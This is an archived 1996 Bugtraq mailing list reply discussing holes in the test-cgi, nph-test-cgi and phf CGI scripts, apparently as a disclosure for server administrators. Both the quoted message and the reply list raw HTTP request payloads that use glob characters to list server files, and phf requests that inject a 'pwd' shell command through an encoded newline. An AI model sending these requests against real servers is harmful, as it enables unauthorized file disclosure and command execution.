Bugtraq mailing list archives
Re: [nph]test-cgi
From: facq () sreaumur u-bordeaux fr (Laurent FACQ)
Date: Mon, 16 Dec 1996 15:59:05 WET
*Hobbit* <hobbit () avian org> writes :
Interesting how many people are suddenly coming out of the woodwork as though test-cgi was a new problem. With minor variants, both scripts are a problem in a couple of areas. Crank each of these plus a couple of newlines into your server and see what you get: GET /cgi-bin/test-cgi?* HTTP/1.0 GET /cgi-bin/test-cgi?x * GET /cgi-bin/nph-test-cgi?* HTTP/1.0 GET /cgi-bin/nph-test-cgi?x * not to mention GET /cgi-bin/phf?Q=x%0apwd GET /cgi-bin/phf?Q=x%ffpwd
you can add too : GET /cgi-bin/test-cgi?x HTTP/1.0 * GET /cgi-bin/nph-test-cgi?x HTTP/1.0 * LF. -- -- Laurent FACQ - facq () u-bordeaux fr (05.56.84.65.34) - Reseau REAUMUR / Bordeaux
Current thread:
- [nph]test-cgi *Hobbit* (Dec 12)
- Re: [nph]test-cgi Laurent FACQ (Dec 16)
- Irix: scanners hole Yuri Volobuev (Dec 16)
- scanf overflow David Sacerdote (Dec 16)